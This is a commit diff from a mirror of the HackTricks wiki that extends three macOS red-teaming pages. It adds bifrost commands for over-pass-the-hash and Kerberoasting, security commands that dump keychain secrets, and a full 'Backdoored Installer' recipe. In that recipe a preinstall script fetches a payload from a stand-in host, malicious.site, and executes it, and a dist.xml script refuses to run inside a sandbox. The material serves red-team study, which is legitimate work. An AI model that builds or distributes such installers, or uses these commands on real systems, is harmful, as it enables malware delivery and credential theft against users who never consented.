mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 08:57:55 +00:00
GITBOOK-4389: No subject
This commit is contained in:
parent
1eac4cf2cc
commit
693e02600d
3 changed files with 127 additions and 14 deletions
|
@ -1,8 +1,8 @@
|
|||
# macOS Red Teaming
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -194,9 +194,50 @@ dsconfigad -show
|
|||
|
||||
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
|
||||
|
||||
### Computer$ password
|
||||
|
||||
Get passwords using:
|
||||
|
||||
```bash
|
||||
bifrost --action askhash --username [name] --password [password] --domain [domain]
|
||||
```
|
||||
|
||||
It's possible to access the **`Computer$`** password inside the System keychain.
|
||||
|
||||
### Over-Pass-The-Hash
|
||||
|
||||
Get a TGT for an specific user and service:
|
||||
|
||||
```bash
|
||||
bifrost --action asktgt --username [user] --domain [domain.com] \
|
||||
--hash [hash] --enctype [enctype] --keytab [/path/to/keytab]
|
||||
```
|
||||
|
||||
Once the TGT is gathered, it's possible to inject it in the current session with:
|
||||
|
||||
```bash
|
||||
bifrost --action asktgt --username test_lab_admin \
|
||||
--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \
|
||||
--enctype aes256 --domain test.lab.local
|
||||
```
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
```bash
|
||||
bifrost --action asktgs --spn [service] --domain [domain.com] \
|
||||
--username [user] --hash [hash] --enctype [enctype]
|
||||
```
|
||||
|
||||
With obtained service tickets it's possible to try to access shares in other computers:
|
||||
|
||||
```bash
|
||||
smbutil view //computer.fqdn
|
||||
mount -t smbfs //server/folder /local/mount/point
|
||||
```
|
||||
|
||||
## Accessing the Keychain
|
||||
|
||||
The Keychain highly probably contains sensitive information that if accessed withuot generating a prompt could help to move forward a red team exercise:
|
||||
The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise:
|
||||
|
||||
{% content-ref url="macos-keychain.md" %}
|
||||
[macos-keychain.md](macos-keychain.md)
|
||||
|
@ -223,8 +264,8 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
|
|||
* [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# macOS Keychain
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -83,6 +83,9 @@ When an **application creates an entry in the keychain**, the rules are slightly
|
|||
### `security`
|
||||
|
||||
```bash
|
||||
# List keychains
|
||||
security list-keychains
|
||||
|
||||
# Dump all metadata and decrypted secrets (a lot of pop-ups)
|
||||
security dump-keychain -a -d
|
||||
|
||||
|
@ -91,6 +94,9 @@ security find-generic-password -a "Slack" -g
|
|||
|
||||
# Change the specified entrys PartitionID entry
|
||||
security set-generic-password-parition-list -s "test service" -a "test acount" -S
|
||||
|
||||
# Dump specifically the user keychain
|
||||
security dump-keychain ~/Library/Keychains/login.keychain-db
|
||||
```
|
||||
|
||||
### APIs
|
||||
|
@ -162,8 +168,8 @@ You can check their website and try their engine for **free** at:
|
|||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# macOS Installers Abuse
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -97,7 +97,7 @@ An example of this is **CVE-2021-26089** which managed to **overwrite a periodic
|
|||
|
||||
### Empty Payload
|
||||
|
||||
It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any payload.
|
||||
It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any real payload apart from the malware inside the scripts.
|
||||
|
||||
### JS in Distribution xml
|
||||
|
||||
|
@ -105,15 +105,81 @@ It's possible to add **`<script>`** tags in the **distribution xml** file of the
|
|||
|
||||
<figure><img src="../../../.gitbook/assets/image (1043).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Backdoored Installer
|
||||
|
||||
Malicious installer using a script and JS code inside dist.xml
|
||||
|
||||
```bash
|
||||
# Package structure
|
||||
mkdir -p pkgroot/root/Applications/MyApp
|
||||
mkdir -p pkgroot/scripts
|
||||
|
||||
# Create preinstall scripts
|
||||
cat > pkgroot/scripts/preinstall <<EOF
|
||||
#!/bin/bash
|
||||
echo "Running preinstall script"
|
||||
curl -o /tmp/payload.sh http://malicious.site/payload.sh
|
||||
chmod +x /tmp/payload.sh
|
||||
/tmp/payload.sh
|
||||
exit 0
|
||||
EOF
|
||||
|
||||
# Build package
|
||||
pkgbuild --root pkgroot/root --scripts pkgroot/scripts --identifier com.malicious.myapp --version 1.0 myapp.pkg
|
||||
|
||||
# Generate the malicious dist.xml
|
||||
cat > ./dist.xml <<EOF
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<installer-gui-script minSpecVersion="1">
|
||||
<title>Malicious Installer</title>
|
||||
<options customize="allow" require-scripts="false"/>
|
||||
<script>
|
||||
<![CDATA[
|
||||
function installationCheck() {
|
||||
if (system.isSandboxed()) {
|
||||
my.result.title = "Cannot install in a sandbox.";
|
||||
my.result.message = "Please run this installer outside of a sandbox.";
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
}
|
||||
function volumeCheck() {
|
||||
return true;
|
||||
}
|
||||
function preflight() {
|
||||
system.run("/path/to/preinstall");
|
||||
}
|
||||
function postflight() {
|
||||
system.run("/path/to/postinstall");
|
||||
}
|
||||
]]>
|
||||
</script>
|
||||
<choices-outline>
|
||||
<line choice="default">
|
||||
<line choice="myapp"/>
|
||||
</line>
|
||||
</choices-outline>
|
||||
<choice id="myapp" title="MyApp">
|
||||
<pkg-ref id="com.malicious.myapp"/>
|
||||
</choice>
|
||||
<pkg-ref id="com.malicious.myapp" installKBytes="0" auth="root">#myapp.pkg</pkg-ref>
|
||||
</installer-gui-script>
|
||||
EOF
|
||||
|
||||
# Buil final
|
||||
productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
|
||||
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
|
||||
* [**DEF CON 27 - Unpacking Pkgs A Look Inside MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
|
||||
* [https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages)
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
Loading…
Reference in a new issue